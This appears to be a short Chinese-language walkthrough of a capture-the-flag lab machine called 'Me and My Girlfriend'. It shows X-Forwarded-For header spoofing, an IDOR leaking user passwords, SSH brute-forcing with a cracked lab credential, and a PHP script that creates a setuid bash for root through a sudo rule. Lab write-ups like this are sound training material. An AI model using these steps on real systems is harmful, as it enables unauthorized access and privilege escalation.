Me and My Girlfriend
usershell
目标IP:192.168.205.144
服务探测:
22/tcp open ssh
80/tcp open http
目录探测并未发现什么有用的信息
携带请求头X-Forwarded-For: 127.0.0.1,访问到登陆页面,经过测试,最后在
index.php?page=profile&user_id=1发现水平越权,可以查看用户名和密码
遍历一下,user_id在1~5的五个用户,作为密码字典去爆破SSH
[22][ssh] host: 192.168.205.144 login: alice password: 4lic3
SSH连接,拿到user权限
rootshell
sudo -l
(root) NOPASSWD: /usr/bin/php
可以利用php提权
exp.php:
<?php
system("cp /bin/bash /tmp/rootbash");
system("chmod +xs /tmp/rootbash");
sudo /usr/bin/php exp.php
/tmp/rootbash -p
拿到root权限